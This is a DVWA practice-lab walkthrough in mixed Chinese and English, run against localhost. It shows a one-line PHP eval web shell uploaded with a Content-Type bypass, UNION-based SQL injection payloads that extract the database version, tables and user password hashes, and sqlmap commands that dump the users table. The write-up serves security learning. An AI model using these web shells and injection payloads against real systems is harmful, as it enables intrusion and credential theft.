DVWA WriteUp
Pub Date: 2023-10-16
http://127.0.0.1/dvwa/login.php
id:admin
pass:password
File Upload
low level
直接上传eval.php 然后用亮剑连接 fild all sub urls
sudo feroxbuster --url 127.0.0.1/dvwa/vulnerabilities/upload
eval.php
<?php @eval($_POST['attack']) ?>
127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php
open AndSword add data
medium level
直接上传eval.php 用Burp抓包
<?php @eval($_POST['attack']) ?>
把Content-Type改成image/png
下一步是用AntSword连接
127.0.0.1/dvwa/vulnerabilities/upload/../../hackable/uploads/eval.php
open AndSword add data
SQL Injection
see source code
http://127.0.0.1/dvwa/vulnerabilities/view_source_all.php?id=sqli
low level
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
allways true scenario
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0#
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0#';";
this payload return first name last name
display database version
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, version() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select @@version,1 #;
display database user
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, user() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select user(),1 #;
display database name
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' or 0=0 union select null, database() #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #;";
#OR
SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select user(),1 #;
display all table_names from information_schema
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables #
SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0
union
select null, table_name COLLATE utf8_general_ci from information_schema.tables#;
display all user tables from information_schema
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#
SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0
union
select null, table_name COLLATE utf8_general_ci from information_schema.tables where table_name like 'user%'#;
display all column feilds from users table
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
$query = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #;";
# 0x0a 是空格
SELECT first_name, last_name COLLATE utf8_general_ci FROM users WHERE user_id = '%' and 1=0
union
select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users;
medium level
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
//mysql_close();
}
?>
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
get database name
id=-1 UNION SELECT 1,DATABASE() &Submit=Submit
get tables from database
"base table".encode("utf-8").hex() #0x62617365207461626c65
"dvwa".encode("utf-8").hex() #0x64767761
id=-1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type=0x62617365207461626c65 AND table_schema=0x64767761&Submit=Submit
get columns from users table
"users".encode("utf-8").hex() #0x7573657273
id=-1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name=0x7573657273 #&Submit=Submit
get user,password from users table
id=-1 UNION SELECT user, password FROM users #&Submit=Submit
SQL Injection (Blind)
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id --dbs
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=sksah6ltdoh1c20mtoi5q6q5fb" --data="id=1&Submit=Submit" -p id -T users --batch --threads 5 --dump